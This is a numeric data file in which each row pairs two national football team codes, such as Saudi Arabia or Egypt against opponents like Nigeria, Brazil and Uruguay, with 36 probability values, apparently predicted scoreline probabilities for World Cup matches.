('KSA', 'NGA',0.000308757758404001,0.000405109559960444,0.000325369151271497,0.000177400579214857,7.30780300515019e-05,0.0013814822589338,0.00230171706493033,0.00191746995400444,0.00106491253291698,0.0070112780730492,0.0116816399800632,0.00973151479673555,0.0266876501126186,0.0444648632219949,0.0677223811039826,0.0859259036115834,0.112833703984773,0.0370419286263027,0.00540462814015322,0.000443568372634208,2.41720043255949e-05,0.14316298119889,0.0939973207334158,0.119263448647579,0.0205721158525515,0.0522036471552449,0.066235792075109,0.00225119156242263,0.00856891027976104,0.0217444025668422,0.0275892165720097,0.000154484654434276,0.000792778861381954,0.00307377388640656,0.00809033580624198,0.0153609672111756),
('KSA', 'BRA',3.31314993332401e-06,9.51961198991297e-06,1.58560467186127e-05,1.79708649316919e-05,1.54034671844172e-05,2.82793322027352e-05,9.81826809698106e-05,0.000170439647819676,0.000197249136418994,0.000264360083348599,0.000917828665065066,0.00159329927526214,0.00185346280015724,0.00643501570308118,0.00866324524250443,0.0202463783263976,0.0300778192960926,0.0111708276787072,0.00184391900665606,0.000171206739375582,1.06065837306941e-05,0.0702931628570251,0.0522134135814254,0.122025002812526,0.0129279550908344,0.0604263788981791,0.141219057503341,0.00160047017965979,0.0112211038186455,0.0524484086026878,0.12257419632744,0.000124983005449822,0.00118313399311127,0.00847017425992694,0.0412618933377709,0.215071884563759),
('KSA', 'SWI',8.46509035656936e-05,0.000150215003899503,0.00016089916033431,0.000117266525073567,6.46341584428427e-05,0.000447296554799299,0.000998592156683115,0.00111468139502714,0.000829510896318101,0.00269442557431056,0.00601532074504843,0.00671461925146489,0.012173013235184,0.0271763227537239,0.0366639065574936,0.0552140221194914,0.0818523843495812,0.0303356491998181,0.00499680882677853,0.000462971973547902,2.86189558717471e-05,0.123265625088911,0.0913679617474124,0.137595611995781,0.0225748376804297,0.0679931684353704,0.10239433433199,0.00278885118235758,0.0125996140615182,0.0379487858664931,0.0571489865367917,0.000217302810600917,0.00132550248425588,0.00611453609039598,0.0191922677323744,0.0490633117508024),
('KSA', 'CRC',0.000337709814191046,0.000392589851462272,0.000276011363646902,0.00013138082709009,4.71970161203114e-05,0.00159765711938916,0.00231750070576585,0.00168083922890746,0.00081272050429304,0.00828704232054318,0.0120208686792026,0.0087185076540772,0.0322386463226527,0.046764155273973,0.0836108771996687,0.108422337528266,0.121282761218514,0.0339171532917564,0.00421557863205633,0.000294725369954477,1.36066447694494e-05,0.157273322725597,0.0879640823146708,0.114067352747774,0.0163996445664692,0.0425324517115905,0.0551539224300472,0.00152873954248976,0.00594717530373984,0.0154239895505941,0.0200010460013878,8.87783001038092e-05,0.000464853982949318,0.00183697738608809,0.00491482658167421,0.00901989638563606),
('KSA', 'SRB',0.000230645006683659,0.000371629669149729,0.000374146705559096,0.000257062512224965,0.000133732200699417,0.000947617825174236,0.0020005323629572,0.00211167921757026,0.00148600082674211,0.00470827117797942,0.00993971262981951,0.0104919495318654,0.0175449033063375,0.037039348497723,0.043586222400616,0.0541399046203275,0.0920156271600842,0.0390972042758486,0.00738324530959204,0.000784280504836471,5.59250784005373e-05,0.114295688032743,0.0971278901374115,0.120645800860659,0.027512927812997,0.0683494556573712,0.084899144874943,0.0038967241838172,0.0145207543134505,0.0360734291822598,0.0448080128923511,0.000350684529404337,0.00176766506586738,0.00674658152833422,0.0175724712685512,0.0366608084452574),
('KSA', 'GER',9.25656165665694e-06,2.54962240741151e-05,4.20885400735845e-05,4.75040462429947e-05,4.06290084501707e-05,5.94383624574108e-05,0.000206539704395302,0.000358847785571691,0.000415648034314494,0.000449645885591535,0.00156245435528583,0.00271465134073232,0.00255114812307788,0.00886487038714572,0.00964960346862239,0.0182495963796311,0.0335309750393814,0.0154020705951957,0.00314434013247986,0.000361079186027863,2.79438896022008e-05,0.0634147053476339,0.0582576419200848,0.110178460133389,0.0178399884983746,0.0674789571553404,0.127618065986621,0.0027315316852227,0.0154978443152352,0.0586199017248901,0.110863575873508,0.000267003365248327,0.0020515949731856,0.0119455292631558,0.0475551891954284,0.204812928181547),
('KSA', 'MEX',0.00011388993825642,0.000195738106752434,0.000204831468228383,0.000145943903079626,7.86614918484999e-05,0.000562023237707338,0.00122748516856573,0.00134044265250954,0.000975863253140175,0.0032068603506052,0.00700393374140017,0.00764846025251241,0.0137235695318868,0.0299729209220768,0.0391528036991048,0.0558507039272411,0.0855115636222904,0.0327311340724324,0.00556819890023379,0.000532832803615156,3.40645259963474e-05,0.121980562590801,0.0933806371738356,0.133205641144219,0.0238287784375496,0.0679825669543987,0.0969757938247162,0.00304030203161285,0.0130107930396475,0.0371192804224427,0.0529499229939818,0.000245069883210716,0.00141658124263087,0.00619412511305048,0.0184410838986095,0.0443517809375777),
('KSA', 'SWE',9.04426036006911e-05,0.000168261773646896,0.000191362745545442,0.000148423156394243,8.71414409620588e-05,0.000443794434759074,0.00105690223136063,0.00125851322049756,0.000999055213226379,0.00256211166039394,0.00610170231705474,0.00726564180271259,0.0110936770149398,0.0264197364201947,0.0320229784450226,0.046218722030098,0.0762631405951079,0.0314594733365936,0.00576774022092968,0.000594815753314174,4.11206100918285e-05,0.110070488988367,0.0908108317190775,0.131067152162369,0.0249737152779803,0.0720890598276744,0.104046043790292,0.00343398713005401,0.0148688071184305,0.0429202589200567,0.0619467523888075,0.000299525574559277,0.00175355749021226,0.0077711431982594,0.0234867082870573,0.0600175693397711),
('KSA', 'KOR',0.000556626094784477,0.000719374790037828,0.000587029619970727,0.000326201944756857,0.000137126775052802,0.00205179844683334,0.00349534461130106,0.00297725002438891,0.00169063305500023,0.00907796080099746,0.0154647750203439,0.0131725214325433,0.0301233434130556,0.0513166711066079,0.0666387410324705,0.0737089795362495,0.113522536646433,0.0437102996396215,0.00748002350126025,0.000720020178834175,4.63162282901398e-05,0.125567053052486,0.0966957518027034,0.106954979647572,0.024820917561291,0.0549087355568341,0.0607344437006686,0.00318565157775205,0.0105709287112612,0.0233849666420871,0.0258660653093309,0.000258387310012078,0.00115820219170449,0.00392741477808756,0.00906882219826348,0.0153618753012223),
('KSA', 'BEL',4.06194533918646e-05,9.71077845324604e-05,0.000144677191604745,0.000147989665297138,0.000114909811441546,0.000188969276161056,0.000597726529147529,0.000945330931315655,0.000996721773948628,0.00111498108935695,0.00352678377218554,0.00557776445469799,0.00493406727886835,0.0156068910729424,0.0145563125956633,0.021471761977196,0.046042903808219,0.024682988211964,0.0058809873852502,0.000788179775267168,7.18144366488814e-05,0.0679170816655552,0.0728188879278568,0.107413867265868,0.026024824727508,0.0767775270522536,0.113253186562843,0.00465052077400935,0.0205797054315701,0.0607135266824553,0.0895574607342664,0.000536148079849161,0.00322171169676325,0.0146954536974707,0.0460219077774596,0.146667893736182),
('KSA', 'TUN',0.000539264023074218,0.000680267897994562,0.000538509868147844,0.000289991212400256,0.0001180868352951,0.00205249492745817,0.00338484679231452,0.00279103925036994,0.00153426936285427,0.00924064136271976,0.0152390901712318,0.0125656791629116,0.0312020696076048,0.0514565097394268,0.0702382089137637,0.0790557494014933,0.115832479271506,0.0424294354166557,0.00690751180247865,0.000632555367363942,3.86278361769901e-05,0.130373817833038,0.0955118550264936,0.107502189942184,0.0233239940406966,0.0525040674139945,0.0590953052509642,0.00284785955554707,0.00961611955241044,0.0216466094254631,0.0243640741499043,0.000219188840252822,0.000999122519405522,0.00344385241128835,0.00807509791464607,0.0137002316193552),
('KSA', 'PAN',0.00149771886227677,0.00145006452502258,0.000901506332618838,0.000380658441464417,0.000121462433338417,0.00480064954801496,0.0061974483973864,0.00400033019012489,0.0017214226031876,0.018382268088361,0.0237307799215726,0.0153177484132842,0.0527909468332412,0.0681510211432667,0.101071462061661,0.0967537149461527,0.130479253757348,0.0439901343078906,0.00659153547216194,0.000555572097413415,3.11233490796419e-05,0.124905213271016,0.0842217739498417,0.0806238412187104,0.0189298402671349,0.0362423246250301,0.0346940617482787,0.00212735279568351,0.00610941847832057,0.0116968513540957,0.0111971648435367,0.000150104597589533,0.000581352439844175,0.00170147210453022,0.00338216971642023,0.00451896891094668),
('KSA', 'ENG',1.28969897708897e-05,2.84972170085205e-05,3.651160048719e-05,3.17452193199495e-05,2.08504208861336e-05,9.93779451623232e-05,0.000263939302065713,0.000350500078569481,0.000310299386047545,0.00082035527021667,0.00217879326356818,0.00289334405331257,0.00507896471601184,0.0134892948346932,0.020963179834415,0.0432622525792123,0.0556764083372417,0.017913205280166,0.00256149124711032,0.000206032141364548,1.09954490851577e-05,0.114900833710104,0.0739358835305671,0.152583381587724,0.0158586458047748,0.0654557892256502,0.135082793193564,0.00170077528496245,0.0105298008994417,0.0434612410634962,0.0896920793098504,0.000114282793066072,0.000953696901616856,0.00601213785885039,0.0257197373508107,0.0973477644258117),
('KSA', 'POL',0.00020619459041188,0.000387291611895809,0.000468995985457438,0.000390268802656149,0.000246610683006532,0.000727641814964728,0.00187410819181367,0.00241346871660568,0.00207203663462541,0.00339383684021211,0.00874113786908857,0.011256800907618,0.0118720450032197,0.0305775401255534,0.0276865504922474,0.0322836157524622,0.0713092486075704,0.0393776287015532,0.00966430752086684,0.0013341800700657,0.000125449735747146,0.0831494115631424,0.0918317530817022,0.107079465576429,0.0338068973891847,0.0788403658592979,0.0919309929164999,0.00622282746832689,0.0217681907615309,0.0507651472413179,0.0591941747172433,0.000740631563434371,0.00352001485912831,0.0127039892154215,0.0315064457121594,0.0701813767032672),
('KSA', 'SEN',0.000337122730056149,0.000442647519640085,0.00035746579204503,0.000196067779794754,8.12684447983184e-05,0.00146340119669826,0.00245409754663319,0.00205773877388488,0.00115026366613077,0.00726997499929558,0.0121916176166246,0.010222561984353,0.0270871736726894,0.0454247041791103,0.06728266856906,0.0835627508516749,0.112831827826031,0.0380882068888587,0.00571435100247021,0.000482242881754129,2.70506431967824e-05,0.140133233673514,0.094608475268008,0.117500459113967,0.0212910798242931,0.0528855717693297,0.0656820538096355,0.00239571602227114,0.00892618970106372,0.0221720387109549,0.0275369063992389,0.000169262162268676,0.000850515244658688,0.00322959671669856,0.0083293244147166,0.0155536927064127),
('KSA', 'COL',2.27668998404537e-05,4.68042562095854e-05,5.63133407067193e-05,4.6000122494175e-05,2.83909005015174e-05,0.000158548231399648,0.00039580909114534,0.000494060498973335,0.000411133855700398,0.00119846283705119,0.00299191282120949,0.00373459320263236,0.0067943670473954,0.0169618558478817,0.0256792407449291,0.0485272138402368,0.0641071606464816,0.0211722852031234,0.00310775240291697,0.000256594659440986,1.40702933901839e-05,0.121146178903149,0.080020435319244,0.151218208314535,0.0176185776188078,0.0665892338610148,0.125836664063718,0.00193959378046087,0.0109960122749584,0.0415593158969971,0.0785365046272164,0.000133938894282048,0.00102379751598567,0.00591280990760874,0.0231843815091947,0.077804700248025),
('KSA', 'JPN',0.000552641679440138,0.000840378654044865,0.000835375097867266,0.000569400902205376,0.00029445329726697,0.00172458322205066,0.00363004451119624,0.00382040802229226,0.00268050293630978,0.00708354919267043,0.014910036545564,0.015691935196842,0.0218212153478964,0.0459310875743493,0.0448142050741052,0.046017440926304,0.0943286221696175,0.0483397641269766,0.0110098916466729,0.00141053572346984,0.000122525146289972,0.0968612918866261,0.0992753184587881,0.101940804150446,0.0339165028779145,0.0696542832805078,0.071524461068192,0.00579363121330663,0.0178475607231856,0.0366535151030665,0.037637641082947,0.000636430496232,0.00266003450904954,0.00843500229045763,0.0183405878883017,0.0323236608998333),
('EGY', 'URU',0.000543325944078518,0.000675832340282234,0.000526534127171318,0.000278943681760322,0.000111727404741466,0.00208622724235973,0.00338325873783598,0.00274333482343863,0.0014829658891346,0.00942613430285647,0.015286470522781,0.0123951226205763,0.0319423524765406,0.0518012807660665,0.0721620584468272,0.0815118843095191,0.117026040990774,0.0420033667053107,0.00670043768660912,0.000601235713978641,3.59458352134367e-05,0.132188761237595,0.0948912390024575,0.107186017999398,0.0227057811247084,0.0512954049269049,0.057941599810276,0.00271654423476235,0.00920555666585375,0.0207965871845161,0.0234911398746502,0.00020466582504639,0.000936025689276917,0.00323655792531709,0.00760994378513853,0.0128616423379486),
('EGY', 'POR',0.000264301835123611,0.00037254896421191,0.000322473875373878,0.000189731319533226,8.43853162323673e-05,0.00117614848777822,0.00211745588466027,0.00190606010638678,0.00114384598847407,0.00601895404364695,0.0108361059778221,0.00975428553791091,0.023101552326932,0.0415904270827693,0.0591112360546301,0.0756256155096709,0.106419755612542,0.0374382552403324,0.00585364561462887,0.000514825178242328,3.01442944125773e-05,0.136151095083671,0.0957953609206087,0.122558478152897,0.0224670764204288,0.0574877670102333,0.0735485849155223,0.00263462404666819,0.0101120402040851,0.0258742437321296,0.0331029384376453,0.00019436496309095,0.00100656360450827,0.00394046823318201,0.0104854663807049,0.0207497440836759),
('EGY', 'ESP',6.20768525332609e-05,0.000114379475544537,0.000126238046987264,9.47542999250973e-05,5.37758413216943e-05,0.000350122811663772,0.000804598646033929,0.00092450271680858,0.000708183537717432,0.00222497106292357,0.00511308787960992,0.00587505790530632,0.0106044851961859,0.0243696044544842,0.0336948520814651,0.0535312669963538,0.0774323507635237,0.0280012471270938,0.00450038622497208,0.000406859747929075,2.45151503712379e-05,0.123017362796426,0.088971587266049,0.141349835325384,0.0214493931607031,0.0681536271130848,0.108276184176139,0.00258552466635592,0.0123229279273042,0.0391550580758427,0.0622059376621706,0.000196331539475518,0.00126300376142746,0.00614325923307461,0.0203216765332843,0.055427998458042),
('EGY', 'MAR',0.000529608750863988,0.000582265531647851,0.000393204796291311,0.000179919044517318,6.21518248294128e-05,0.00224243852918883,0.00312942475165277,0.00218362714268015,0.00101578359744469,0.010641756957423,0.0148510548628859,0.0103626605748876,0.0378762861278385,0.052858076494082,0.0898731952237892,0.106625966343051,0.125422123274516,0.0368829224864353,0.00482052106429579,0.000354393029149856,1.72327928317569e-05,0.148801375778867,0.0875161329666629,0.103829536993109,0.0171572641479264,0.040710911969254,0.0482996105637464,0.00168181398710712,0.0059859352214426,0.0142034813798247,0.0168510747146382,0.00010290361902406,0.000493208627303762,0.00178463374127524,0.00437550454553853,0.00729978860314597),
('EGY', 'IRN',0.000250785302462109,0.000217786974893202,0.000109923024019519,3.73396709487478e-05,9.54931776990826e-06,0.00150174447511659,0.00154508761541065,0.000794840859697528,0.000272593815368326,0.00902584488783442,0.00928634756836898,0.00477718442052926,0.0406856212670212,0.0418598840126129,0.122265176535043,0.183710767190158,0.12579397706499,0.021534019083171,0.00163835428441078,7.01153450440426e-05,1.95747275975709e-06,0.189013001816481,0.0647123126726597,0.0972341344007814,0.00738517698288651,0.0221933434819408,0.0333468308240118,0.000421410059507885,0.00189958173360149,0.00570847116914468,0.00857732060498752,1.47625453799798e-05,8.92376832513665e-05,0.00040612092620641,0.00124390582965477,0.00236534221665415),
('EGY', 'FRA',0.000133105887730826,0.000206737936628946,0.000193559854082384,0.000123078022244033,5.91397292665171e-05,0.000685877478531046,0.00133334431765841,0.00129600921817665,0.000839813028214941,0.00396231225710897,0.00770272635882356,0.0074870415945216,0.017167700042208,0.0333739713214771,0.0495888773380477,0.0716187010957254,0.0964006690514961,0.0324394636156377,0.00485159749304297,0.000408148672363504,2.28198529698057e-05,0.139226598238186,0.093701344862327,0.135328101183157,0.0210207487652328,0.0607184031355536,0.087692510873572,0.00235787372796125,0.0102160724022737,0.0295091107129925,0.0426185123197566,0.000166041736947873,0.00097018907638843,0.00428379908179953,0.0128461184030304,0.0294130793171823),
('EGY', 'AUS',0.00477967158577463,0.00393331384382593,0.00221934141952867,0.000853232755326284,0.000248213945302594,0.0108722152021842,0.0128220553860415,0.00756079148845795,0.00297225191078026,0.0323912994288159,0.0382004060422473,0.0225256634887326,0.0723768978429825,0.0853570846009512,0.107815276195502,0.0803027908596633,0.127151037496238,0.0503325792394428,0.00885515047573856,0.000876325061465757,5.80248118172351e-05,0.0947044197441431,0.0749772523285715,0.0558444297082332,0.0197864344027089,0.0294745969173793,0.0219532192046448,0.00261081177433006,0.00583374117155169,0.00869015437810593,0.00647258602109243,0.000218029935012746,0.000658335712770544,0.00150415974449968,0.00234163063632169,0.00242452404636833),
('EGY', 'PER',0.000610742808384726,0.000657499365239925,0.000436901444478033,0.000196750330766046,6.68959854884316e-05,0.00249948124320485,0.00343362989685493,0.0023584522389652,0.00107996437794588,0.0115390541218756,0.0158516257411466,0.0108879824976737,0.0399532214103101,0.0548852190361735,0.0922236134898379,0.106439413204966,0.126690991314932,0.0376989284257237,0.00498574151764256,0.00037089675965108,1.82568951488085e-05,0.146219761551663,0.0870200519855407,0.100433749230909,0.0172628044417709,0.0398475554258487,0.0459898528878079,0.00171227441489199,0.00592863835205491,0.0136850154405784,0.0157944907825215,0.000106063020919906,0.000494587737452283,0.00174130677833666,0.00415480919972027,0.00672184166166679),
('EGY', 'DEN',0.000832095564946362,0.000890227798596377,0.000597807888940108,0.000272461663397775,9.38133476431494e-05,0.00307582091117431,0.00428290005695659,0.00298184345376526,0.0013840139881108,0.013200941518154,0.018381536120839,0.0127976049926838,0.0424922797843887,0.0591680051486784,0.0911851041731483,0.0978380457021591,0.126969904664465,0.0411939868964175,0.00593997122881335,0.000481789557949702,2.59357533564392e-05,0.136233735191793,0.0883990693254627,0.0948487394198733,0.0191200695055614,0.0410301715631408,0.0440237672256135,0.0020677653095619,0.00665589359225068,0.0142830263204128,0.0153251278766778,0.000140160422869111,0.000608172718542044,0.00199362714486254,0.00443551664640131,0.0067468644177922),
('EGY', 'ARG',0.000172487649156569,0.000256646031909579,0.000231479731798408,0.000141808887778366,6.56515249881667e-05,0.000846503725651906,0.00158559925563423,0.00148500527716617,0.000927195471102523,0.00468734832988334,0.00877994484553232,0.00822292542236861,0.0194664539267737,0.0364629167253339,0.0538958350314073,0.0746094035580239,0.100953124384388,0.0341496273825715,0.0051341630417525,0.000434186053840281,2.4407854674151e-05,0.139752030806257,0.0945484314050487,0.130885848050534,0.0213220655413306,0.0590333776900101,0.0817214372298074,0.002404220102823,0.00998467290409199,0.0276440838021028,0.0382684228415983,0.000170234563343854,0.00095347496815773,0.00403572660720246,0.0116023575231998,0.0251138540962011),
('EGY', 'ICE',0.00328497244982177,0.00293273970887444,0.00176129267403775,0.000720515739632975,0.00022300743050046,0.00822968182630851,0.0103243268837375,0.00647605386526084,0.00270811996675678,0.026430889353516,0.0331581642246793,0.0207988433541784,0.063665150739901,0.0798694094393678,0.102235213365232,0.0820860292511948,0.128256448315786,0.0500990140607283,0.00869754392795315,0.000849349840226895,5.54623295900319e-05,0.102978829128989,0.0804503457913947,0.0645946657763518,0.020950125356504,0.0336422754200467,0.0270118358763641,0.00272781768764119,0.00657060464185788,0.0105512538601109,0.00847174378072353,0.000224629492364435,0.000731035312840684,0.00180000559213196,0.00301900120970807,0.00341194467699963),
('EGY', 'CRO',0.000516268948923905,0.000593549695057811,0.000421107183795121,0.00020263793441214,7.36452454078245e-05,0.00213988516170079,0.0031437692717822,0.00230930271658753,0.00113088855570188,0.0100692283873064,0.0147930044850684,0.0108664225935683,0.0355355612524389,0.0522063555187043,0.0836062814318342,0.0983523271970176,0.122828487807481,0.0383489589088492,0.00532139544296981,0.000415355547444422,2.14873708603244e-05,0.144492344535209,0.0902255019521056,0.106139011776809,0.0187798673779697,0.0441843275276058,0.0519773318888528,0.00195445528760453,0.00689751616671817,0.016228129161058,0.0190903630888685,0.000127277209207341,0.000605246951193778,0.00217375423527902,0.00529518097173718,0.00893032434987073),
('EGY', 'NGA',0.00167693783100712,0.00140484731414402,0.000746765977991855,0.000268809509847937,7.30328355391063e-05,0.00563592586428523,0.00618367905628729,0.00339233407180521,0.00124067784997453,0.0218251394298715,0.0239463152715126,0.0131368236369167,0.0633884373131845,0.0695491320615571,0.122735954652003,0.118823836040561,0.134664608887873,0.0381542910311643,0.00480452861078956,0.000340314698118372,1.59244250322894e-05,0.130372273164193,0.0738763019293783,0.0715215489432478,0.013954163346494,0.0270187692313674,0.0261575657619524,0.00131786966601806,0.00382759060851621,0.0074111779255925,0.00717495206025727,7.75767525649384e-05,0.000303299360733741,0.000895003683292646,0.00178847493272391,0.00229470863746182),
('EGY', 'BRA',3.63481032689754e-05,6.82623323469395e-05,7.52999262513996e-05,5.63635568813673e-05,3.18698108825404e-05,0.000239041543890975,0.000546530200921723,0.000624776881159561,0.000476150754429977,0.00170506127480292,0.00389834949161352,0.0044564758414679,0.00912153355284095,0.0208549254000054,0.0325315285673903,0.0580110978488545,0.0743781292357102,0.0238407232139343,0.00339633939411402,0.00027216060778784,1.44682592784842e-05,0.132633083132548,0.085026839380511,0.15162214984346,0.0181693316234792,0.0648000829395083,0.115553253030534,0.00194129650148814,0.0103853166076882,0.0370387525241495,0.0660485009927189,0.000129935218612497,0.000936899877380311,0.0051031312246032,0.0188612600654826,0.0569774515475949),
('EGY', 'SWI',0.000573202503465829,0.00065560417602397,0.000465066152440608,0.00022385257127757,8.1391692423469e-05,0.00230117852467533,0.00338312429167934,0.00248688440514751,0.00121871451974666,0.0105769591377876,0.0155499310494381,0.0114305232956047,0.0364613382021978,0.0536043760430953,0.0837940386063946,0.0962861108804107,0.123191505772985,0.0394037804514312,0.00560160523738922,0.000447929468766333,2.37602185827853e-05,0.141556979251233,0.0905562456889225,0.104056432394606,0.0193100890695482,0.0443777005663799,0.050993558353518,0.00205882839464655,0.00709727979654442,0.0163106941926827,0.018742303577826,0.000137498589484771,0.000638849287986339,0.00224217354664819,0.0053396693747024,0.00881734668384206),
('EGY', 'CRC',0.00171861313403633,0.00127440765812285,0.000592549796435609,0.000186142181207568,4.40928682356639e-05,0.00608734403416997,0.00581485898007329,0.00277728552619496,0.000884322379435679,0.0240926016581598,0.0230141553227296,0.0109919914987541,0.0715156049256272,0.0683143839386859,0.141522885197863,0.14003046646642,0.135187959684767,0.0326282288863773,0.00349998730243361,0.000211184463227175,8.37832842892124e-06,0.13376234542445,0.0645683008023003,0.0638874007383983,0.0103892353643252,0.0205593529592321,0.0203425458794456,0.000835829734669891,0.00248104666892622,0.00490976596313684,0.00485799040273794,4.16749945667636e-05,0.00016628734578271,0.00050031837951237,0.00101703799515592,0.00128322702474728),
('EGY', 'SRB',0.00143989448352058,0.00148560681032622,0.000991353031838314,0.000450028414955137,0.000154483107851143,0.00447675904639923,0.00622373544314211,0.00432621931008089,0.00200481674174631,0.0169719538553774,0.0235949600267285,0.0164012388734642,0.0482571009546646,0.0670885849521884,0.0914743547852562,0.0866976819767922,0.127170611175392,0.0466343620093899,0.00760051119051721,0.000696790294233455,4.25996792398806e-05,0.120529925905042,0.088398351563609,0.0837823036754527,0.0216108669015522,0.0409647506182911,0.0388256241839668,0.00264161921560574,0.00751103180326396,0.014237630822883,0.0134941601073118,0.000203552543077133,0.000781323713576901,0.00226785322277997,0.00447801991290532,0.00608704343952276),
('EGY', 'GER',9.83476783594986e-05,0.000176632906890028,0.000193366424685275,0.000144238833494397,8.14149780504742e-05,0.000487423426397678,0.00111536793998431,0.00127614469696194,0.000973397942928743,0.00281352035448451,0.00643816081036078,0.00736620130613197,0.0121802159422272,0.027871911008565,0.0351535068069475,0.0507285357947497,0.0804415470144011,0.0318895587300778,0.00561867726728618,0.00055685508717404,3.69282067537231e-05,0.116081787217274,0.0920369413157843,0.132814609296797,0.0243242250997567,0.0702025166609375,0.101306276465483,0.00321429590252019,0.0139152425652471,0.0401609935782709,0.0579546277267959,0.000268843623774298,0.00157279841398947,0.00696253448001008,0.0210016462252709,0.0524024884297831),
('EGY', 'MEX',0.000750770162544534,0.000830193696054509,0.000575458460281496,0.0002708147231136,9.629502877989e-05,0.00281146702201022,0.00404361704110442,0.00290788379289242,0.00139409643511591,0.0122404855220103,0.0176049853904397,0.01266026212932,0.0399692094842932,0.0574860652196449,0.0870084063210666,0.0947036840134005,0.125140601602235,0.0413399181154171,0.00606957758946832,0.000501267848586302,2.74941111253168e-05,0.136208402066956,0.0899922825363691,0.0979514629600273,0.0198191663000952,0.0431440625579831,0.0469598495169349,0.00218240576725057,0.00712627233079244,0.0155130813571838,0.0168851036014114,0.000150746261788783,0.000663678332955673,0.00220771003319057,0.00498597581169426,0.00777435066165386),
('EGY', 'SWE',0.000637435497452725,0.000764305096388367,0.000576035688586976,0.000295165449696276,0.00011434215142724,0.00238092858454005,0.00373400053313682,0.00292800886007245,0.00153066142842078,0.0104882358661062,0.0164486572885893,0.0128981808786261,0.0346513201710524,0.0543435232928666,0.0763213187883521,0.0840508193171151,0.119694411204049,0.0426133623380596,0.0067427213889028,0.000600132509946669,3.55777508344172e-05,0.131816555178753,0.0938581270667883,0.10336368140349,0.0222767871216663,0.049065771898448,0.0540349458573642,0.00264364557429805,0.00873414846721939,0.0192374122030804,0.0211856959874328,0.000197483334304836,0.000880468257864855,0.00296771140943671,0.00680084884480377,0.0110815117177414),
('EGY', 'KOR',0.00296085010447631,0.00243090773673033,0.00131401882221773,0.000482286339483602,0.000133752158538041,0.0081784120180264,0.00917485760787519,0.00514635432521893,0.00192445950100024,0.0276097495824184,0.0309736805200614,0.0173737339068397,0.0699064442758237,0.078423741759384,0.117999644454117,0.0995896461015781,0.132376546114349,0.0439893870676351,0.00649684129229584,0.000539733198048777,2.97858871080887e-05,0.111723500868713,0.0742525540743403,0.0626678632517173,0.0164496629139281,0.0277664583764973,0.0234344075865823,0.00182210169976746,0.00461346636120127,0.00778737062029411,0.00657240526210637,0.000126638173104221,0.000432347184641203,0.001115303583771,0.00195354682123694,0.00222671082582481),
('EGY', 'BEL',0.000371278399844309,0.000575326333925838,0.000569102683731628,0.000384967732059455,0.000197346600099804,0.00133007487321021,0.00277052749815773,0.00288548516051659,0.00200347517866732,0.0059881444278312,0.0124732217218754,0.0129907738530793,0.0202194671954937,0.0421168695022479,0.0455151406357241,0.0512285513525164,0.0948074061495784,0.0438644272749359,0.00901986720377564,0.00104330274674263,8.13573135860659e-05,0.106708361364932,0.0987412554950585,0.111136017753405,0.0304563310441904,0.0685588881903595,0.0771649274346,0.00469706454522314,0.015860028700352,0.0357018031090367,0.040183368180416,0.000462670927156537,0.00211596973802468,0.00733361858957237,0.0173813898493044,0.0329973178293525),
('EGY', 'TUN',0.00283120028840719,0.00226940789259768,0.00118968000771743,0.000423090757817708,0.000113650439519923,0.00806961755218942,0.00876364788438091,0.00475868427126243,0.00172265220239468,0.0277212526179833,0.0301054288244509,0.0163473284774318,0.0714223296587533,0.0775650325636147,0.122677216747279,0.105357103169026,0.133228114474563,0.0421180204100026,0.00591776209549755,0.000467702379679204,2.45099634277607e-05,0.11441837835812,0.0723432229596977,0.0621294858738615,0.0152467985863133,0.0261883758736513,0.0224909848128805,0.00160668033314682,0.00413952623251251,0.00711017911741763,0.00610633249340195,0.000105999299090274,0.000368041918917932,0.000965218828834689,0.00171727582698045,0.00196939129931559),
('EGY', 'PAN',0.00671444029488802,0.00408351651766817,0.00168045189143314,0.000468494640461861,9.8598722472924e-05,0.0159107500265072,0.013526287445753,0.0057495860270674,0.00162930834324034,0.0464867966264347,0.0395200586115583,0.0167986949629142,0.101866140360476,0.0865999838605783,0.148812298042773,0.108697060526715,0.126510561440295,0.0368108440062301,0.00476038687477223,0.000346283062579019,1.66551172189361e-05,0.0924071890227245,0.0537755359148423,0.0392792985463613,0.0104313971438497,0.0152388239632902,0.0111309037793208,0.00101174302144596,0.00221702427593687,0.00323876487468048,0.00236569306599752,6.12263294417765e-05,0.00018065022180041,0.000402371203583499,0.000607158474279332,0.000563148769231446),
('EGY', 'ENG',0.000106017777984956,0.000152308854704398,0.00012914024215154,7.4125566489588e-05,3.21094339236802e-05,0.000624658599576773,0.00109252609324037,0.000955412496698016,0.000557004569193331,0.00393454537715147,0.00688150854320854,0.00601786932046216,0.0185869297269172,0.0325084866095505,0.0585368699654738,0.0921767391306299,0.102380817133117,0.0284286247693961,0.00350841204180447,0.000243549847192583,1.11619861218204e-05,0.161216851506175,0.0895318772854367,0.140983904696013,0.0165738609733104,0.0521969985831235,0.0821934812134004,0.00153405064146524,0.00724690878799563,0.0228231000820009,0.0359390405337986,8.843284316149e-05,0.000562250568278195,0.0026977668446313,0.00876292122863032,0.0206945102663883),
('EGY', 'POL',0.00147271883739862,0.0017742127262848,0.00142683547569167,0.000785285406291783,0.000327634510317412,0.0039631728700922,0.00672194679171078,0.00570055485234734,0.00322290814765091,0.0141044515317733,0.0239225932934483,0.0202875832709457,0.0376470241520491,0.0638532058810843,0.0669905962814743,0.0596028516360596,0.113622907329443,0.0541507860598088,0.0114699391749828,0.00136659551533621,0.000109946867368415,0.101092536324943,0.0963580396847831,0.0857316438734538,0.0306150917084843,0.0544776989671241,0.0484698806884535,0.00486354767793663,0.0129815821964757,0.0230999382183981,0.0205524695533136,0.00049441870163988,0.00178829031796297,0.0049033133343068,0.00920082323767563,0.0128349123001414),
('EGY', 'SEN',0.00182857077623591,0.00153193307649789,0.000818897171600236,0.000296561267289542,8.10757876302545e-05,0.00596070255475128,0.00658265220447361,0.00363474855917126,0.00133800142941564,0.0225947134259963,0.0249522835231107,0.013777923208828,0.0642358518287364,0.0709383277831276,0.121746610438409,0.115373554886142,0.134449854900203,0.0391700756306873,0.00507184490142393,0.000369402682738764,1.77901443095509e-05,0.127411824098462,0.0742392885419622,0.0703530932028481,0.0144190488918243,0.0273285132577627,0.0258979507761839,0.00140026241514494,0.00398088912768021,0.00754500398186301,0.00715004654242932,8.48484730292853e-05,0.000324803079339601,0.000938615960336038,0.00183760097005947,0.00231637936892863),
